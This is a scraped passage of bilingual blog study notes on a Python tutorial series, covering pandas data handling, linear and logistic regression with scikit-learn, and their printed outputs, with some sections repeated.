    <seaborn.axisgrid.FacetGrid at 0x238adc47910>

    png

    import numpy as np
    from sklearn import linear_model

    reg = linear_model.LinearRegression()
    reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

    reg.coef_, reg.intercept_
    (array([-0.35642282, -0.3475    , -0.04279945]), 25.189636192124166)
    reg.predict([[13, 2, 23]])
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(array([18.8767522])

    48 - What is logistic regression

    虽然是 Regression,不过主要用于 Classfication (二分类问题)。

    逻辑回归(Logistic Regression)(一) - 知乎 (zhihu.com)

    49 - Logistic Regression using scikit-learn in Python

    • STEP1: DATA READING AND UNDERSTANDING
    import pandas as pd
    from matplotlib import pyplot as plt

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    plt.scatter(df.Time, df.Productivity, marker='+', color='red')
    <matplotlib.collections.PathCollection at 0x206c9140bb0>

    png

    sizes = df['Productivity'].value_counts(sort=1)
    plt.pie(sizes, autopct='%1.1f%%')
    ([<matplotlib.patches.Wedge at 0x206cc3afb80>,  <matplotlib.patches.Wedge at 0x206cc3b9310>], [Text(-0.08630492316306847, 1.096609073570804, ''),  Text(0.08630482049111692, -1.0966090816512493, '')], [Text(-0.04707541263440097, 0.598150403765893, '52.5%'),  Text(0.04707535663151831, -0.5981504081734086, '47.5%')])

    png

    • STEP2: DROP IRRLEVANT DATA 丢弃无关数据
    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good
    • STEP3: DEAL WITH MISSING VALUES 处理缺失数据
    df = df.dropna()
    • STEP4: CONVERT NON-NUMERIC TO NUMERIC

    将 Good 和 Bad 替换成计算机便于理解的数字类型

    df.Productivity[df.Productivity == 'Good'] = 1
    df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1
    • STEP 5: PREPARE THE DATA(define indep/dep variables)
    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
    array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
    X = df.drop(labels=['Productivity'], axis=1)
    X.head()
    Time Coffee Age
    0 8 0 23
    1 13 0 23
    2 17 0 23
    3 22 0 23
    4 8 2 23
    • STEP 6: SPLIT DATA
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
    X_train.head()
    Time Coffee Age
    42 18 4 31
    5 13 2 23
    54 17 2 45
    12 8 6 23
    78 17 6 52
    • STEP 7: DEFINE THE MODEL
    from sklearn.linear_model import LogisticRegression

    model = LogisticRegression()
    model.fit(X_train, y_train)
    • STEP 8: TESTING THE MODEL
    prediction_test = model.predict(X_test)
    prediction_test
    array([2, 2, 2, 1, 1, 2, 1, 2])
    • STEP 9: VERIFY THE ACCURACY 验证准确性
    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
    Accuracy = 0.75
    • STEP 10: WEIGHTS
    model.coef_
    array([[0.18788991, 0.19204588, 0.0200644 ]])
    weights = pd.Series(model.coef_[0], index=X.columns.values)
    weights
    Time      0.187890Coffee    0.192046Age       0.020064dtype: float64
    ]]>
    + 正文

    43 - What is machine learning anyway

    • Machine Learning 机器学习
      • Supervised Learning 监督学习
        • Classification problem 分类问题
          • Support Vector Machines 支持向量机
          • Discriminant Analysis 判别分析法
          • Naive Bayes 朴素贝叶斯
          • Nearest Neighbor 邻近算法
        • Regression 回归
          • Linear Regression, GLM 线性回归,广义线性模型
          • SVR, GPR 支持向量回归,高斯过程回归
          • Ensemble Methods 集成学习算法
          • Decision Trees 决策树
          • Neural Networks 神经网络
      • Unsupervised Learning 无监督学习
        • Clustering 聚类
          • K-Means, K-Medoids, Fuzzy C-Means
          • Hierarchical 层次聚类
          • Gaussian Mixture 高斯混合模型
          • Neural Networks 神经网络
          • Hidden Markov Model 隐马尔科夫模型

    • Machine Learning VS Deep Learning

    png

    ​ 在数据量大的情况下使用深度学习效果更好。

    png

    44 - What is linear regression

    ​ 介绍了下线性回归以及损失函数。

    45 - Linear regression using Sci-Kit Learn in Python

    1
    2
    3
    4
    5
    6
    7
    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model

    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    1
    2
    3
    plt.xlabel('time')
    plt.ylabel('cells')
    plt.scatter(df.time, df.cells, color='red', marker='+')
    <matplotlib.collections.PathCollection at 0x2c7bd4eb0d0>

    png

    • x independent (time)

    • y dependent - we are predicting Y

    1
    2
    x_df = df[['time']]
    x_df
    time
    0 0.0
    1 0.5
    2 1.0
    3 1.5
    4 2.0
    5 2.5
    6 3.0
    7 3.5
    8 4.0
    9 4.5
    10 5.0
    1
    x_df.dtypes
    time    float64dtype: object
    1
    y_df = df.cells
    • 创建并训练模型
    1
    2
    reg = linear_model.LinearRegression()  # Create an instance of the model
    reg.fit(x_df, y_df) # Training the model (fitting a line)
    • 预测模型
    1
    2
    # Predict
    reg.predict([[2.3]])
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(array([257.61090909])
    • 评分
    1
    reg.score(x_df, y_df)
    0.9784252641866715
    • Y = mx + C
    1
    2
    3
    c = reg.intercept_
    m = reg.coef_
    2.3 * m + c
    array([257.61090909])
    • 预测多个数据
    1
    2
    cells_predict_df = pd.read_csv('data/cells_predict.csv')
    cells_predict_df.head()
    time
    0 0.1
    1 0.2
    2 0.3
    3 0.4
    4 0.5
    1
    2
    predicted_cells = reg.predict(cells_predict_df)
    predicted_cells
    array([212.33090909, 214.38909091, 216.44727273, 218.50545455,       220.56363636, 222.62181818, 224.68      , 226.73818182,       228.79636364, 230.85454545, 232.91272727, 234.97090909,       237.02909091, 239.08727273, 241.14545455, 243.20363636,       245.26181818, 247.32      , 249.37818182, 251.43636364,       253.49454545, 255.55272727, 257.61090909, 259.66909091,       261.72727273, 263.78545455, 265.84363636, 267.90181818,       269.96      , 272.01818182, 274.07636364, 276.13454545,       278.19272727, 280.25090909, 282.30909091, 284.36727273,       286.42545455, 288.48363636, 290.54181818, 292.6       ])
    • 将预测数据合并并保存
    1
    2
    cells_predict_df['cells'] = predicted_cells
    cells_predict_df.head()
    time cells
    0 0.1 212.330909
    1 0.2 214.389091
    2 0.3 216.447273
    3 0.4 218.505455
    4 0.5 220.563636
    1
    cells_predict_df.to_csv('predicted_cells.csv')

    46 - Splitting data into training and testing sets for machine learning

    1
    2
    3
    4
    import pandas as pd
    import numpy as np
    import matplotlib.pyplot as plt
    from sklearn import linear_model
    1
    2
    df = pd.read_csv('data/cells.csv')
    df
    time cells
    0 0.0 205
    1 0.5 225
    2 1.0 238
    3 1.5 240
    4 2.0 248
    5 2.5 260
    6 3.0 265
    7 3.5 283
    8 4.0 301
    9 4.5 305
    10 5.0 309
    1
    2
    x_df = df.drop('cells', axis='columns')
    y_df = df.cells
    • 分割训练集(train)和测试集(test)
    1
    2
    3
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(x_df, y_df, test_size=0.4, random_state=10)
    1
    X_train
    time
    10 5.0
    3 1.5
    1 0.5
    0 0.0
    4 2.0
    9 4.5
    1
    2
    3
    4
    5
    reg = linear_model.LinearRegression()
    reg.fit(X_train, y_train)

    prediction_test = reg.predict(X_test)
    prediction_test
    array([229.66081871, 270.73684211, 291.2748538 , 260.46783626,       281.00584795])
    • 计算均方误差
    1
    print('Mean sq. error between y_test and predicted =', np.mean(prediction_test - y_test) ** 2)
    Mean sq. error between y_test and predicted = 7.677112273861912
    • 计算残差
    1
    2
    plt.scatter(prediction_test, prediction_test - y_test)
    plt.hlines(y=0, xmin=200, xmax=310) # 画一条水平线
    <matplotlib.collections.LineCollection at 0x26a2470d640>

    png

    47 - Multiple Linear Regression with SciKit-Learn in Python

    1
    2
    3
    4
    import pandas as pd

    df = pd.read_excel('data/images_analyzed.xlsx')
    df.head()
    User Time Coffee Age Images_Analyzed
    0 1 8 0 23 20
    1 1 13 0 23 14
    2 1 17 0 23 18
    3 1 22 0 23 15
    4 1 8 2 23 22
    1
    2
    3
    import seaborn as sns

    sns.lmplot(x='Time', y='Images_Analyzed', data=df, hue='Age')
    <seaborn.axisgrid.FacetGrid at 0x238adc47910>

    png

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    from sklearn import linear_model

    reg = linear_model.LinearRegression()
    reg.fit(df[['Time', 'Coffee', 'Age']], df.Images_Analyzed)

    reg.coef_, reg.intercept_
    (array([-0.35642282, -0.3475    , -0.04279945]), 25.189636192124166)
    1
    reg.predict([[13, 2, 23]])
    C:\Users\gzjzx\anaconda3\lib\site-packages\sklearn\base.py:450: UserWarning: X does not have valid feature names, but LinearRegression was fitted with feature names  warnings.warn(array([18.8767522])

    48 - What is logistic regression

    虽然是 Regression,不过主要用于 Classfication (二分类问题)。

    逻辑回归(Logistic Regression)(一) - 知乎 (zhihu.com)

    49 - Logistic Regression using scikit-learn in Python

    • STEP1: DATA READING AND UNDERSTANDING
    1
    2
    3
    4
    5
    import pandas as pd
    from matplotlib import pyplot as plt

    df = pd.read_csv('data/images_analyzed_productivity1.csv')
    df.head()
    User Time Coffee Age Images_Analyzed Productivity
    0 1 8 0 23 20 Good
    1 1 13 0 23 14 Bad
    2 1 17 0 23 18 Good
    3 1 22 0 23 15 Bad
    4 1 8 2 23 22 Good
    1
    plt.scatter(df.Time, df.Productivity, marker='+', color='red')
    <matplotlib.collections.PathCollection at 0x206c9140bb0>

    png

    1
    2
    sizes = df['Productivity'].value_counts(sort=1)
    plt.pie(sizes, autopct='%1.1f%%')
    ([<matplotlib.patches.Wedge at 0x206cc3afb80>,  <matplotlib.patches.Wedge at 0x206cc3b9310>], [Text(-0.08630492316306847, 1.096609073570804, ''),  Text(0.08630482049111692, -1.0966090816512493, '')], [Text(-0.04707541263440097, 0.598150403765893, '52.5%'),  Text(0.04707535663151831, -0.5981504081734086, '47.5%')])

    png

    • STEP2: DROP IRRLEVANT DATA 丢弃无关数据
    1
    2
    3
    df.drop(['Images_Analyzed'], axis=1, inplace=True)
    df.drop(['User'], axis=1, inplace=True)
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 Good
    1 13 0 23 Bad
    2 17 0 23 Good
    3 22 0 23 Bad
    4 8 2 23 Good
    • STEP3: DEAL WITH MISSING VALUES 处理缺失数据
    1
    df = df.dropna()
    • STEP4: CONVERT NON-NUMERIC TO NUMERIC

    将 Good 和 Bad 替换成计算机便于理解的数字类型

    1
    2
    3
    df.Productivity[df.Productivity == 'Good'] = 1
    df.Productivity[df.Productivity == 'Bad'] = 2
    df.head()
    Time Coffee Age Productivity
    0 8 0 23 1
    1 13 0 23 2
    2 17 0 23 1
    3 22 0 23 2
    4 8 2 23 1
    • STEP 5: PREPARE THE DATA(define indep/dep variables)
    1
    2
    3
    Y = df['Productivity'].values
    Y = Y.astype('int')
    Y
    array([1, 2, 1, 2, 1, 2, 1, 1, 1, 2, 1, 1, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 1,       1, 2, 2, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2, 1, 2,       1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 1, 2, 2, 2])
    1
    2
    X = df.drop(labels=['Productivity'], axis=1)
    X.head()
    Time Coffee Age
    0 8 0 23
    1 13 0 23
    2 17 0 23
    3 22 0 23
    4 8 2 23
    • STEP 6: SPLIT DATA
    1
    2
    3
    4
    from sklearn.model_selection import train_test_split

    X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=0.1, random_state=20)
    X_train.head()
    Time Coffee Age
    42 18 4 31
    5 13 2 23
    54 17 2 45
    12 8 6 23
    78 17 6 52
    • STEP 7: DEFINE THE MODEL
    1
    2
    3
    4
    from sklearn.linear_model import LogisticRegression

    model = LogisticRegression()
    model.fit(X_train, y_train)
    • STEP 8: TESTING THE MODEL
    1
    2
    prediction_test = model.predict(X_test)
    prediction_test
    array([2, 2, 2, 1, 1, 2, 1, 2])
    • STEP 9: VERIFY THE ACCURACY 验证准确性
    1
    2
    3
    from sklearn import metrics

    print('Accuracy =', metrics.accuracy_score(y_test, prediction_test))
    Accuracy = 0.75
    • STEP 10: WEIGHTS
    1
    model.coef_
    array([[0.18788991, 0.19204588, 0.0200644 ]])
    1
    2
    weights = pd.Series(model.coef_[0], index=X.columns.values)
    weights
    Time      0.187890Coffee    0.192046Age       0.020064dtype: float64
    ]]>
    @@ -9009,7 +9009,7 @@ /posts/DIP-Python%20tutorials%20for%20image%20processing%20and%20machine%20learning(36-42)-Pandas/ - 正文

    36 - Introduction to Pandas - Data reading and handling

    • 绘制直方图
    import pandas as pd

    df = pd.read_csv('images/grains/grain_measurements.csv')
    df['Area'].plot(kind='hist', title='Area', bins=50)
    <AxesSubplot:title={'center':'Area'}, ylabel='Frequency'>

    png

    • 创建 DataFrame, 修改 index 和 columns
    data = [[10, 200, 60],
    [12, 155, 45],
    [9, 50, -45.],
    [16, 240, 90]]

    df = pd.DataFrame(data, index=[1, 2, 3, 4], columns=['Area', 'Intensity', 'Orientation'])
    df
    Area Intensity Orientation
    1 10 200 60.0
    2 12 155 45.0
    3 9 50 -45.0
    4 16 240 90.0

    png

    • 查看各行缺失信息
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.info()
    <class 'pandas.core.frame.DataFrame'>RangeIndex: 100 entries, 0 to 99Data columns (total 7 columns): #   Column      Non-Null Count  Dtype  ---  ------      --------------  -----   0   Unnamed: 0  100 non-null    object  1   Image       100 non-null    object  2   Manual      94 non-null     float64 3   Manual2     3 non-null      float64 4   Auto_th_2   100 non-null    int64   5   Auto_th_3   100 non-null    int64   6   Auto_th_4   100 non-null    int64  dtypes: float64(2), int64(3), object(2)memory usage: 5.6+ KB
    • 查看表格行列数
    df.shape
    (100, 7)
    • 查看整个表格
    df
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    ... ... ... ... ... ... ... ...
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102

    100 rows × 7 columns

    • 查看表格前 7 行
    df.head(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    • 查看表格后 7 行
    df.tail(7)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    93 Set4 Image94 81.0 NaN 65 90 70
    94 Set4 Image95 NaN NaN 104 122 88
    95 Set4 Image96 106.0 NaN 75 112 98
    96 Set4 Image97 80.0 NaN 66 80 88
    97 Set4 Image98 92.0 NaN 73 93 95
    98 Set4 Image99 116.0 NaN 101 115 93
    99 Set4 Image100 99.0 NaN 77 106 102
    • 将某一列改为 index
    df1 = df.set_index('Image')
    df1.head()
    Unnamed: 0 Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    Image
    Image1 Set1 92.0 93.0 70 87 82
    Image2 Set1 87.0 83.0 60 85 83
    Image3 Set1 104.0 98.0 74 99 94
    Image4 Set1 99.0 NaN 73 101 109
    Image5 Set1 89.0 NaN 59 90 67
    • 查看 columns(列)名
    df1.columns
    Index(['Unnamed: 0', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',       'Auto_th_4'],      dtype='object')
    • 去重
    df['Unnamed: 0'].unique()
    array(['Set1', 'Set2', 'Set3', 'Set4'], dtype=object)
    • 修改列名
    df1 = df.rename(columns={'Unnamed: 0': 'Image_set'})
    df1.columns
    Index(['Image_set', 'Image', 'Manual', 'Manual2', 'Auto_th_2', 'Auto_th_3',       'Auto_th_4'],      dtype='object')
    • 显示数据类型
    df.dtypes
    Unnamed: 0     objectImage          objectManual        float64Manual2       float64Auto_th_2       int64Auto_th_3       int64Auto_th_4       int64dtype: object
    • 显示统计数据
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000

    37 - Introduction to Pandas - Data Manipulation

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    • 删除某列
    df1 = df.drop('Manual2', axis=1)
    df1.head()
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    • 删除多列
    df2 = df.drop(['Manual2', 'Auto_th_2'], axis=1)
    df2.head()
    Unnamed: 0 Image Manual Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 87 82
    1 Set1 Image2 87.0 85 83
    2 Set1 Image3 104.0 99 94
    3 Set1 Image4 99.0 101 109
    4 Set1 Image5 89.0 90 67
    • 添加并填充一列
    df['Date'] = '2019-06-24'
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    df.dtypes
    Unnamed: 0     objectImage          objectManual        float64Manual2       float64Auto_th_2       int64Auto_th_3       int64Auto_th_4       int64Date           objectdtype: object
    • 将字符串转换成时间
    df['Date'] = pd.to_datetime('2019-06-24')
    df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    1 Set1 Image2 87.0 83.0 60 85 83 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    df.dtypes
    Unnamed: 0            objectImage                 objectManual               float64Manual2              float64Auto_th_2              int64Auto_th_3              int64Auto_th_4              int64Date          datetime64[ns]dtype: object
    • 保存成 .csv 文件
    df.to_csv('data/manual_vs_auto_updated.csv')
    • 删除某行
    df1 = df.drop(df.index[1])
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    0 Set1 Image1 92.0 93.0 70 87 82 2019-06-24
    2 Set1 Image3 104.0 98.0 74 99 94 2019-06-24
    3 Set1 Image4 99.0 NaN 73 101 109 2019-06-24
    4 Set1 Image5 89.0 NaN 59 90 67 2019-06-24
    5 Set1 Image6 115.0 NaN 82 124 105 2019-06-24
    • 删除前 10 行
    df1 = df.iloc[10:,]
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    10 Set1 Image11 91.0 NaN 61 87 77 2019-06-24
    11 Set1 Image12 119.0 NaN 79 105 111 2019-06-24
    12 Set1 Image13 NaN NaN 65 90 84 2019-06-24
    13 Set1 Image14 117.0 NaN 94 115 105 2019-06-24
    14 Set1 Image15 91.0 NaN 66 99 70 2019-06-24
    • 选取某些行
    df1 = df[df['Unnamed: 0'] != 'Set1']
    df1.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4 Date
    25 Set2 Image26 102.0 NaN 85 103 105 2019-06-24
    26 Set2 Image27 93.0 NaN 76 84 98 2019-06-24
    27 Set2 Image28 83.0 NaN 62 71 87 2019-06-24
    28 Set2 Image29 110.0 NaN 92 117 85 2019-06-24
    29 Set2 Image30 89.0 NaN 70 96 81 2019-06-24

    38 - Introduction to Pandas - Data Sorting

    • 排序
    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df2 = df.sort_values('Manual', ascending=True) # ascending: 升序
    • 选取某行/列
    df2[['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    34 80.0 58
    96 80.0 66
    93 81.0 65
    66 81.0 65
    44 82.0 67
    ... ... ...
    32 NaN 66
    59 NaN 74
    79 NaN 69
    82 NaN 64
    94 NaN 104

    100 rows × 2 columns

    df[20: 30]
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    20 Set1 Image21 89.0 NaN 65 94 86
    21 Set1 Image22 88.0 NaN 66 96 83
    22 Set1 Image23 106.0 NaN 71 112 105
    23 Set1 Image24 107.0 NaN 92 91 111
    24 Set1 Image25 108.0 NaN 93 113 115
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • loc 方法是通过行、列的名称或者标签来寻找我们需要的值。

    Pandas 读取某列、某行数据——loc、iloc 用法总结_子木同学的博客-CSDN 博客_pandas iloc

    df.loc[20: 30, ['Manual', 'Auto_th_2']]
    Manual Auto_th_2
    20 89.0 65
    21 88.0 66
    22 106.0 71
    23 107.0 92
    24 108.0 93
    25 102.0 85
    26 93.0 76
    27 83.0 62
    28 110.0 92
    29 89.0 70
    30 115.0 77
    set2_df = df[df['Unnamed: 0'] == 'Set2']
    set2_df.head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    25 Set2 Image26 102.0 NaN 85 103 105
    26 Set2 Image27 93.0 NaN 76 84 98
    27 Set2 Image28 83.0 NaN 62 71 87
    28 Set2 Image29 110.0 NaN 92 117 85
    29 Set2 Image30 89.0 NaN 70 96 81
    • 选取最大值
    max(set2_df['Manual'])
    120.0
    • 根据条件选取某些值
    df['Manual'] > 100
    0     False1     False2      True3     False4     False      ...  95     True96    False97    False98     True99    FalseName: Manual, Length: 100, dtype: bool
    df[df['Manual'] > 100].head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    • 复合条件
    df[(df['Manual'] > 100) & (df['Auto_th_2'] < 100)].head()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    2 Set1 Image3 104.0 98.0 74 99 94
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    8 Set1 Image9 104.0 NaN 88 99 112
    • 遍历某些行/列
    for index, row in df.iterrows():
    average_auto = (row['Auto_th_2'] + row['Auto_th_3'] + row['Auto_th_4']) / 3
    print(round(average_auto), row['Manual'])
    80 92.076 87.089 104.094 99.072 89.0104 115.088 102.096 117.0100 104.087 103.075 91.098 119.080 nan...

    39 - Introduction to Pandas - Grouping Data

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df = df.rename(columns = {'Unnamed: 0': 'Image_set'})
    df.head()
    Image_set Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    df = df.drop('Manual2', axis=1)
    df.head()
    Image_set Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    • 以 Image_set 为分组做统计
    group_by_file = df.groupby(by=['Image_set'])
    set_data_count = group_by_file.count()
    set_data_avg = group_by_file.mean()
    set_data_count
    Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 25 24 25 25 25
    Set2 25 24 25 25 25
    Set3 25 24 25 25 25
    Set4 25 22 25 25 25
    set_data_avg
    Manual Auto_th_2 Auto_th_3 Auto_th_4
    Image_set
    Set1 100.666667 72.84 98.04 92.36
    Set2 98.666667 75.40 98.00 93.44
    Set3 100.000000 78.48 95.52 94.40
    Set4 100.818182 78.76 98.76 92.64
    • 统计关联性(手动与自动阈值)
    df['Manual'].corr(df['Auto_th_2'])
    0.7381233054217538

    40 - Introduction to Pandas - Dealing with missing -null- data

    import pandas as pd

    df = pd.read_csv('data/manual_vs_auto.csv')
    df.head(8)
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 93.0 70 87 82
    1 Set1 Image2 87.0 83.0 60 85 83
    2 Set1 Image3 104.0 98.0 74 99 94
    3 Set1 Image4 99.0 NaN 73 101 109
    4 Set1 Image5 89.0 NaN 59 90 67
    5 Set1 Image6 115.0 NaN 82 124 105
    6 Set1 Image7 102.0 NaN 68 103 93
    7 Set1 Image8 117.0 NaN 77 122 88
    • 查看缺失值
    df.isnull()
    Unnamed: 0 Image Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    0 False False False False False False False
    1 False False False False False False False
    2 False False False False False False False
    3 False False False True False False False
    4 False False False True False False False
    ... ... ... ... ... ... ... ...
    95 False False False True False False False
    96 False False False True False False False
    97 False False False True False False False
    98 False False False True False False False
    99 False False False True False False False

    100 rows × 7 columns

    df.isnull().sum()
    Unnamed: 0     0Image          0Manual         6Manual2       97Auto_th_2      0Auto_th_3      0Auto_th_4      0dtype: int64
    • 删除缺失值
    df = df.drop('Manual2', axis=1)
    df2 = df.dropna()
    df2.head(10)
    Unnamed: 0 Image Manual Auto_th_2 Auto_th_3 Auto_th_4
    0 Set1 Image1 92.0 70 87 82
    1 Set1 Image2 87.0 60 85 83
    2 Set1 Image3 104.0 74 99 94
    3 Set1 Image4 99.0 73 101 109
    4 Set1 Image5 89.0 59 90 67
    5 Set1 Image6 115.0 82 124 105
    6 Set1 Image7 102.0 68 103 93
    7 Set1 Image8 117.0 77 122 88
    8 Set1 Image9 104.0 88 99 112
    9 Set1 Image10 103.0 69 98 94
    df = pd.read_csv('data/manual_vs_auto.csv')
    df.describe()
    Manual Manual2 Auto_th_2 Auto_th_3 Auto_th_4
    count 94.000000 3.000000 100.000000 100.000000 100.000000
    mean 100.021277 91.333333 76.370000 97.580000 93.210000
    std 11.285140 7.637626 11.971055 12.327337 14.128769
    min 80.000000 83.000000 55.000000 71.000000 63.000000
    25% 90.250000 88.000000 67.750000 89.500000 83.750000
    50% 101.000000 93.000000 74.500000 98.500000 93.000000
    75% 108.000000 95.500000 85.000000 106.000000 103.250000
    max 120.000000 98.000000 109.000000 124.000000 129.000000
    • 填充缺失值
    df['Manual'].fillna(100, inplace=True)
    df.head(10)
